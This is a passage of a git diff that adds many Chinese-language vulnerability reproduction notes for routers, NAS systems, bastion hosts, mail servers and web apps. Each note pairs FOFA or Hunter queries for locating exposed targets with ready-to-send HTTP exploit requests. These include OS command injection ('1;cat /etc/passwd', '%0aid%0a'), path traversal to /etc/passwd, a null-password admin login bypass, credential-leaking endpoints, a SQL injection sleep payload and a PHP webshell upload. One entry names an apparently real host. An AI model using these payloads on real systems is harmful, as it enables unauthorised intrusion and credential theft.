+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: image/avif,image/webp,*/*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+```
+
+![1700224435510-cba34aea-f31f-4e71-9451-e269543ab40d.png](./img/W8kMt7wlSfRQcUAD/1700224435510-cba34aea-f31f-4e71-9451-e269543ab40d-773404.png)
+
+2. 使用上一步的`cookie`和获取到的验证码对红框中的参数进行相应替换，校验验证码
+
+```plain
+POST /auth/verify-captcha HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 37
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+
+args={"captcha":"ckpa"}
+```
+
+![1700224521182-4598afce-46ee-488a-b40a-b37cb99f9605.png](./img/W8kMt7wlSfRQcUAD/1700224521182-4598afce-46ee-488a-b40a-b37cb99f9605-298334.png)
+
+3. 使用校验后的验证码和`cookie`对红框中的参数进行相应替换，当响应`code`为`0`时表示存在漏洞！
+
+```plain
+POST /auth/do-login HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 94
+
+args={"type":2,"username":"admin","password":null,"captcha":"ckpa","oath":"","remember":false}
+```
+
+![1700224596713-4717833e-361d-45ae-9429-ebbe5555683c.png](./img/W8kMt7wlSfRQcUAD/1700224596713-4717833e-361d-45ae-9429-ebbe5555683c-262748.png)
+
+4. 使用上一步的`cookie`对红框中的参数进行相应替换，登录系统，获取管理员权限
+
+```plain
+GET /dashboard HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+```
+
+![1700224741128-1ec98d01-7787-4beb-8659-da182c4bd023.png](./img/W8kMt7wlSfRQcUAD/1700224741128-1ec98d01-7787-4beb-8659-da182c4bd023-330070.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/od1gvmdxp2ns8ze9>
\ No newline at end of file
diff --git a/Teleport堡垒机get-file后台任意文件读取漏洞.md b/Teleport堡垒机get-file后台任意文件读取漏洞.md
new file mode 100644
index 0000000..993bd1d
--- /dev/null
+++ b/Teleport堡垒机get-file后台任意文件读取漏洞.md
@@ -0,0 +1,40 @@
+# Teleport堡垒机 get-file 后台任意文件读取漏洞
+
+# 一、漏洞简介
+Teleport堡垒机 get-file接口存在后台任意文件读取漏洞，攻击者利用任意用户登录漏洞后可以获取后台权限，再进一步利用任意文件读取获取服务器上的敏感文件
+
+# 二、影响版本
++ Teleport堡垒机<= 20220817  
+
+
+# 三、资产测绘
++ hunter`app.name="Teleport 堡垒机系统"`
++ 特征
+
+![1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218.png](./img/wf_kz4gZxf1izLnh/1700224400227-6b4b586e-6399-4e83-8cb6-7af26e9b2218-967661.png)
+
+# 四、漏洞复现
+1. 通过`Teleport堡垒机 do-login 任意用户登录漏洞`登录后台，获取管理员cookie
+
+![1700225092406-56c1fcf6-9f0d-49f2-83f2-7d97ab0f1928.png](./img/wf_kz4gZxf1izLnh/1700225092406-56c1fcf6-9f0d-49f2-83f2-7d97ab0f1928-923223.png)
+
+2. 通过上一步获取到的cookie读取服务器上的文件
+
+```plain
+GET /audit/get-file?f=/etc/passwd&rid=1&type=rdp&act=read&offset=0 HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: _sid=tp_1700221267_fbf3ff64ee297b12
+Upgrade-Insecure-Requests: 1
+```
+
+![1700225157574-3c40beac-b489-43ea-b047-ac449a073872.png](./img/wf_kz4gZxf1izLnh/1700225157574-3c40beac-b489-43ea-b047-ac449a073872-489991.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wg3n45g9dgsgstm6>
\ No newline at end of file
diff --git a/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md b/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md
new file mode 100644
index 0000000..dc55338
--- /dev/null
+++ b/TelesquareSDT-CW3B1无线路由器admin.cgi远程命令执行漏洞(CVE-2021-46422).md
@@ -0,0 +1,32 @@
+# Telesquare SDT-CW3B1无线路由器admin.cgi 远程命令执行漏洞(CVE-2021-46422)
+
+# 一、漏洞简介
+Telesquare SDT-CW3B1是韩国Telesquare公司的无线路由器产品。Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。
+
+# 二、影响版本
++ Telesquare SDT-CW3B1 1.1.0
+
+# 三、资产测绘
++ hunter`app.name=="Telesquare Router"`
++ 特征
+
+![1700233053166-8eb3438f-a051-4482-9c4d-133f3bf80241.png](./img/hUm6GNLeu2yN1SN-/1700233053166-8eb3438f-a051-4482-9c4d-133f3bf80241-391808.png)
+
+# 四、漏洞复现
+```plain
+GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1700235255810-240921a9-b67b-4b8f-bfbc-20a922f14f97.png](./img/hUm6GNLeu2yN1SN-/1700235255810-240921a9-b67b-4b8f-bfbc-20a922f14f97-240162.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qig0nr6ohmhnx304>
\ No newline at end of file
diff --git a/TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md b/TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md
new file mode 100644
index 0000000..fc60814
--- /dev/null
+++ b/TelesquareTLR-2005Ksh路由器getUsernamePassword信息泄露漏洞.md
@@ -0,0 +1,29 @@
+# Telesquare TLR-2005Ksh 路由器 getUsernamePassword 信息泄露漏洞
+
+# 一、漏洞简介
+Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器。Telesquare TLR-2005Ksh存在安全漏洞，攻击者可通过未授权getUsernamePassword获取用户名密码等敏感信息。
+
+# 二、影响版本
++ Telesquare Tlr-2005Ksh
+
+# 三、资产测绘
++ hunter`web.title="TLR-2005KSH"||banner="TLR-2005KSH login:"`
++ 特征
+
+![1700496629079-11703d7f-49e5-4047-bb1c-b189cacaf8bb.png](./img/AwpEpB3xYB_xa3gz/1700496629079-11703d7f-49e5-4047-bb1c-b189cacaf8bb-310968.png)
+
+# 四、漏洞复现
+```plain
+/cgi-bin/admin.cgi?Command=getUsernamePassword
+```
+
+![1700496653815-05ae5b82-3d65-4580-be00-b9fd1c8cee07.png](./img/AwpEpB3xYB_xa3gz/1700496653815-05ae5b82-3d65-4580-be00-b9fd1c8cee07-960383.png)
+
+使用账户密码成果登录后台
+
+![1700496675659-d3ed50e9-aec5-4f26-9e2e-ae504baf99f3.png](./img/AwpEpB3xYB_xa3gz/1700496675659-d3ed50e9-aec5-4f26-9e2e-ae504baf99f3-709363.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/awpgpcgce8hdzmr4>
\ No newline at end of file
diff --git a/Tenda路由器DownloadCfg信息泄露漏洞.md b/Tenda路由器DownloadCfg信息泄露漏洞.md
new file mode 100644
index 0000000..d4a53e4
--- /dev/null
+++ b/Tenda路由器DownloadCfg信息泄露漏洞.md
@@ -0,0 +1,43 @@
+# Tenda 路由器 DownloadCfg 信息泄露漏洞
+
+# 一、漏洞描述
+Tenda 路由器是深圳市吉祥腾达科技有限公司的一款智能无限路由器。Tenda 路由器存在信息泄露漏洞，攻击者通过构造特殊 URL 地址，读取系统敏感信息网访问该系统。
+
+# 二、影响版本
++ Tenda 路由器
+
+# 三、资产测绘
++ hunter`web.title="Tenda | LOGIN"`
++ 特征
+
+![1701753587120-3c35a8f8-5e6c-44fc-a622-f307f0b5e7fc.png](./img/HuzV0y4anBpmEYe1/1701753587120-3c35a8f8-5e6c-44fc-a622-f307f0b5e7fc-543813.png)
+
+# 四、漏洞复现
+```java
+GET /cgi-bin/DownloadCfg.jpg HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: lang=cn,en
+Upgrade-Insecure-Requests: 1
+```
+
+![1701753858226-d38759e2-793c-45df-83c1-16c137293980.png](./img/HuzV0y4anBpmEYe1/1701753858226-d38759e2-793c-45df-83c1-16c137293980-207037.png)
+
+从配置文件中可找到系统账号密码
+
+![1701753905473-968c5560-03de-480e-81eb-4e6028247296.png](./img/HuzV0y4anBpmEYe1/1701753905473-968c5560-03de-480e-81eb-4e6028247296-014519.png)
+
+解密后成功登录系统
+
+![1701753934193-5e17d3df-29e6-4613-a5d9-2ac1258b5991.png](./img/HuzV0y4anBpmEYe1/1701753934193-5e17d3df-29e6-4613-a5d9-2ac1258b5991-492114.png)
+
+![1701753950653-631706d4-3fa3-4c1a-bf44-e84c5f7514c9.png](./img/HuzV0y4anBpmEYe1/1701753950653-631706d4-3fa3-4c1a-bf44-e84c5f7514c9-018661.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gk3rgwxmuynm2p33>
\ No newline at end of file
diff --git a/TerraMasterTOSexportUser.php远程命令执行.md b/TerraMasterTOSexportUser.php远程命令执行.md
new file mode 100644
index 0000000..c8ddb13
--- /dev/null
+++ b/TerraMasterTOSexportUser.php远程命令执行.md
@@ -0,0 +1,33 @@
+# TerraMaster TOS exportUser.php 远程命令执行
+
+# 一、漏洞简介
+TerramasterTOS是中国深圳市图美电子技术（Terramaster）公司的一款基于Linux平台的，专用于erraMaster云存储NAS服务器的操作系统。TerramasterTOS系统 exportUser.php 存在远程代码执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。
+
+# 二、影响版本
++ TerraMaster TOS < 4.1.24
+
+# 三、资产测绘
++ fofa`"TerraMaster" && header="TOS"`
++ 特征
+
+![1707230386875-617c7117-0c8e-4228-971d-4e0b14395464.png](./img/uG6FSbneaAIz9Qah/1707230386875-617c7117-0c8e-4228-971d-4e0b14395464-909380.png)
+
+# 四、漏洞复现
+```plain
+/include/exportUser.php?type=3&cla=application&func=_exec&opt=(whoami)>test.txt
+```
+
+![1707230462067-53cbb3cb-0e94-4ff3-8ba3-4e7d3eed053a.png](./img/uG6FSbneaAIz9Qah/1707230462067-53cbb3cb-0e94-4ff3-8ba3-4e7d3eed053a-148007.png)
+
+获取命令执行结果
+
+```plain
+/include/test.txt
+```
+
+![1707230499837-b1a050ef-95af-4d15-bb97-28d5b9c755d3.png](./img/uG6FSbneaAIz9Qah/1707230499837-b1a050ef-95af-4d15-bb97-28d5b9c755d3-148022.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/atopoc3573ymfsnt>
\ No newline at end of file
diff --git a/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md b/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md
new file mode 100644
index 0000000..5e5fd33
--- /dev/null
+++ b/Tosei自助洗衣机web管理端network_test.php文件host参数远程命令执行漏洞.md
@@ -0,0 +1,46 @@
+# Tosei 自助洗衣机 web 管理端 network_test.php 文件 host 参数远程命令执行漏洞
+
+# 一、漏洞简介
+Tosei 自助洗衣机 是日本 Tosei 公司的一个产品。Tosei 自助洗衣机 web 管理端存在安全漏洞，攻击者利用该漏洞可以通过 network_test.php 的命令执行,在服务器任意执行代码，获取服务器权限，进而控制整个服务器。
+
+# 二、影响版本
++ Tosei 自助洗衣机 web 管理端
+
+# 三、资产测绘
++ hunter`web.body="tosei_login_check.php"`
++ 特征
+
+![1700496989279-62c782a3-21b7-48d2-9e04-6ed199d00499.png](./img/yJFddX_3R3th-rYw/1700496989279-62c782a3-21b7-48d2-9e04-6ed199d00499-769255.png)
+
+# 四、漏洞复现
+访问poc出现如下页面表示可能存在漏洞
+
+```plain
+/cgi-bin/network_test.php
+```
+
+![1700497024236-9303403b-bf49-4e18-a628-52f74865cf9e.png](./img/yJFddX_3R3th-rYw/1700497024236-9303403b-bf49-4e18-a628-52f74865cf9e-898026.png)
+
+修改host参数为想要执行的命令
+
+```plain
+POST /cgi-bin/network_test.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 26
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+host=%0aid%0a&command=ping
+```
+
+![1700497061931-b49ccd9b-f202-444d-a21e-0a9b40cc7c69.png](./img/yJFddX_3R3th-rYw/1700497061931-b49ccd9b-f202-444d-a21e-0a9b40cc7c69-543775.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bihozhmkgaeqymw2>
\ No newline at end of file
diff --git a/TraggoServer任意文件读取漏洞(CVE-2023-34843).md b/TraggoServer任意文件读取漏洞(CVE-2023-34843).md
new file mode 100644
index 0000000..6b9e18b
--- /dev/null
+++ b/TraggoServer任意文件读取漏洞(CVE-2023-34843).md
@@ -0,0 +1,36 @@
+# Traggo Server任意文件读取漏洞(CVE-2023-34843)
+
+# 一、漏洞简介
+`Traggo Server`是一个基于标签的时间跟踪工具。在`Traggo`中，没有任务，只有标记的时间跨度。可以用来跟踪、分析每天时间用在哪些地方，方便更好的管理时间，提高效率。`Traggo`存在任意文件读取漏洞。
+
+## 二、影响版本
++ `Traggo Server`
+
+# 三、资产测绘
++ hunter`app.name="Traggo"`
++ 登录页面
+
+![1693741695368-68067cc7-61f5-4530-b5a9-52f16a282aa5.png](./img/VlgslYayTvwObt7Z/1693741695368-68067cc7-61f5-4530-b5a9-52f16a282aa5-647572.png)
+
+# 四、漏洞复现
+```java
+GET /static/..%5c..%5c..%5c..%5cetc/passwd HTTP/2
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+```
+
+![1693741775280-eb64edb6-8d52-406d-bcce-f9d83ee9f3c4.png](./img/VlgslYayTvwObt7Z/1693741775280-eb64edb6-8d52-406d-bcce-f9d83ee9f3c4-724816.png)
+
+
+
+> 更新: 2024-02-29 23:57:33  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gcc1enullkmmd0hf>
\ No newline at end of file
diff --git a/TurboMail邮件系统viewfile文件读取漏洞.md b/TurboMail邮件系统viewfile文件读取漏洞.md
new file mode 100644
index 0000000..9adee90
--- /dev/null
+++ b/TurboMail邮件系统viewfile文件读取漏洞.md
@@ -0,0 +1,54 @@
+# TurboMail 邮件系统 viewfile 文件读取漏洞
+
+# 一、漏洞简介
+广州拓波软件科技有限公司TurboMail 邮件系统 viewfile 文件读取漏洞，攻击者可通过此漏洞读取账户密码，从而登录后台进一步利用。
+
+# 二、影响版本
++ TurboMail 邮件系统 
+
+# 三、资产测绘
++ hunter`web.body="maintlogin.jsp" && web.body="/mailmain?type=logout"`
++ 特征
+
+![1703260614409-67417cea-6ca3-44cc-ad4a-9ef98c998a10.png](./img/6F2qdw-ilKskSp6w/1703260614409-67417cea-6ca3-44cc-ad4a-9ef98c998a10-727801.png)
+
+# 四、漏洞复现
+1. 通过poc读取账号密码
+
+```java
+GET /viewfile?type=cardpic&mbid=1&msgid=2&logtype=3&view=true&cardid=/accounts/root/postmaster&cardclass=../&filename=/account.xml HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ
+Upgrade-Insecure-Requests: 1
+```
+
+![1703260773166-a588ef0c-2a56-4b0b-bb52-4e57d2f18feb.png](./img/6F2qdw-ilKskSp6w/1703260773166-a588ef0c-2a56-4b0b-bb52-4e57d2f18feb-271259.png)
+
+2. 密码为base64加密，去掉=号后面解密
+
+```java
+Y2hlbHNlYTUzMDUzNjQ5NQ=3D=3D
+Y2hlbHNlYTUzMDUzNjQ5NQ
+```
+
+![1703261028456-e47d326e-0092-4521-a34c-e8cae2a8a7ca.png](./img/6F2qdw-ilKskSp6w/1703261028456-e47d326e-0092-4521-a34c-e8cae2a8a7ca-482506.png)
+
+3. 通过获取到的账号密码登录系统
+
+```java
+/maintlogin.jsp
+```
+
+![1703261079028-7b0ea268-948d-4b03-ada0-7aa983833032.png](./img/6F2qdw-ilKskSp6w/1703261079028-7b0ea268-948d-4b03-ada0-7aa983833032-995619.png)
+
+![1703261120667-59e7ac2f-9576-4846-8ff1-8c6e94414883.png](./img/6F2qdw-ilKskSp6w/1703261120667-59e7ac2f-9576-4846-8ff1-8c6e94414883-426450.png)
+
+
+
+> 更新: 2024-02-29 23:57:46  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ca5k7x5pqtitv191>
\ No newline at end of file
diff --git a/VEXUS多语言货币交易所存在未授权访问漏洞.md b/VEXUS多语言货币交易所存在未授权访问漏洞.md
new file mode 100644
index 0000000..46df582
--- /dev/null
+++ b/VEXUS多语言货币交易所存在未授权访问漏洞.md
@@ -0,0 +1,41 @@
+# VEXUS多语言货币交易所存在未授权访问漏洞
+
+# 一、漏洞简介
+VEXUS多语言货币交易所存在未授权访问漏洞
+
+# 二、影响版本
++ VEXUS多语言货币交易所
+
+# 三、资产测绘
++ fofa`"image/n2.png" && "public/login.action"`
++ 特征
+
+![1727498799522-822e93ff-50be-42a1-9e0b-111a2f844864.png](./img/cvy4scQ9X281hrqb/1727498799522-822e93ff-50be-42a1-9e0b-111a2f844864-063597.png)
+
+# 四、漏洞复现
+```java
+/druid/index.html
+```
+
+![1727498820102-2db97c04-7594-473e-9e30-dd4678d21aca.png](./img/cvy4scQ9X281hrqb/1727498820102-2db97c04-7594-473e-9e30-dd4678d21aca-036126.png)
+
+获取session后可通过下面poc进行爆破
+
+```java
+GET /normal/LoginSuccessAction!view.action?username=admin HTTP/1.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cache-Control: no-cache
+Connection: keep-alive
+Cookie: JSESSIONID=可用的SESSION
+Host: admin.kftust.com
+Pragma: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+```
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nkwou5fss984m2t8>
\ No newline at end of file
diff --git a/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md b/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md
new file mode 100644
index 0000000..7ee07ce
--- /dev/null
+++ b/VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504).md	
@@ -0,0 +1,33 @@
+## VICIdial Unauthenticated SQLi to RCE (CVE-2024-8503 and CVE-2024-8504)
+
+This vulnerability can lead to username and plaintext password exposure. When combined with CVE-2024-8504, it causes a remote code execution vulnerability via sql injection.
+
+The following PoC code tests the vulnerability on a time based.
+
+
+CVE-2024-8503 (Sqli)
+```
+An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
+```
+
+CVE-2024-8504 (RCE)
+```
+An attacker with authenticated access to VICIdial as an "agent" can execute arbitrary shell commands as the "root" user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.
+```
+
+## fofa
+```
+icon_hash="1375401192"
+```
+## Poc Example
+```
+        GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
+        Host: 
+        Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=
+```
+
+## Exploits
+https://en.0day.today/exploit/39746
+https://github.com/Chocapikk/CVE-2024-8504
+## Nuclei Template
+https://github.com/projectdiscovery/nuclei-templates/pull/10757
\ No newline at end of file
diff --git a/Vben-Admin存在硬编码漏洞.md b/Vben-Admin存在硬编码漏洞.md
new file mode 100644
index 0000000..542ec75
--- /dev/null
+++ b/Vben-Admin存在硬编码漏洞.md
@@ -0,0 +1,25 @@
+# Vben-Admin存在硬编码漏洞
+<font style="color:rgba(0, 0, 0, 0.84);">Vue Vben Admin是一个免费开源的中端和后端模板。采用最新的vue3、vite、TypeScript等主流技术开发，开箱即用的中后端前端解决方案也可供学习参考。Vue Vben存在硬编码漏洞</font>
+
+## fofa
+```javascript
+icon_hash="-317536629"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729264064913-c5ad6880-499b-442e-9fee-00d4eb8fa551.png)
+
+## poc
+登录页面，右击查看源代码，搜索index，进入该js页面
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730100317021-035ebb28-c6be-490c-aaf7-20bdc01dab17.png)
+
+该页面硬编码登录账号密码
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730100355251-30a27295-5a99-4dc4-8114-4859ca2fb8eb.png)
+
+使用账号密码登录系统
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730128898635-bddc9b02-c118-4394-87d6-316664320abb.png)
+
+
+
diff --git a/ViessmannVitogateRCE漏洞（CVE-2023-45852）.md b/ViessmannVitogateRCE漏洞（CVE-2023-45852）.md
new file mode 100644
index 0000000..1fbd9f7
--- /dev/null
+++ b/ViessmannVitogateRCE漏洞（CVE-2023-45852）.md
@@ -0,0 +1,37 @@
+# Viessmann Vitogate RCE 漏洞（CVE-2023-45852）
+
+# 一、漏洞简介
+Viessmann Vitogate 300是用于将Viessmann LON连接到BACnet或Modbus的网关。Vitogate 300组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证，通过特制的请求执行任意命令，可导致服务器失陷。
+
+# 二、影响版本
++ Viessmann Vitogate 300
+
+# 三、资产测绘
++ fofa`app=”Vitogate-300”`
++ 特征
+
+![1707059485948-359f6933-eb77-4147-aa79-353f587ead29.png](./img/6dQ4EvIoNFpWhwei/1707059485948-359f6933-eb77-4147-aa79-353f587ead29-940674.png)
+
+# 四、漏洞复现
+```plain
+POST /cgi-bin/vitogate.cgi HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: langCookie=en
+Upgrade-Insecure-Requests: 1
+Content-Type: application/json
+Content-Length: 87
+
+{"method":"put","form":"form-4-8","session":"","params":{"ipaddr":"1;cat /etc/passwd"}}
+```
+
+![1707059530155-faca9058-dfe5-4cf3-819c-73e8e71af6df.png](./img/6dQ4EvIoNFpWhwei/1707059530155-faca9058-dfe5-4cf3-819c-73e8e71af6df-407474.png)
+
+
+
+> 更新: 2024-02-29 23:57:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/llhplei5z29a1kqg>
\ No newline at end of file
diff --git a/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md b/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md
new file mode 100644
index 0000000..db6c778
--- /dev/null
+++ b/VvvebJs Arbitrary File Upload - RCE (CVE-2024-29272).md	
@@ -0,0 +1,20 @@
+## VvvebJs < 1.7.5 Arbitrary File Upload - RCE (CVE-2024-29272)
+
+## fofa
+```
+icon_hash="524332373"
+```
+## poc
+```
+POST /save.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+file=demo%2Flanding%2Findex.php&html=<?php%20phpinfo();%20?>
+```
+## nuclei Template
+https://github.com/projectdiscovery/nuclei-templates/pull/10608/files
+
+## ref
+https://github.com/givanz/VvvebJs/issues/343
+https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/tree/main
\ No newline at end of file
diff --git a/W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md b/W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md
new file mode 100644
index 0000000..cffc3e8
--- /dev/null
+++ b/W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞.md
@@ -0,0 +1,24 @@
+# W&Jsoft-D-Security数据仿泄露系统(DLP)存在任意文件读取漏洞
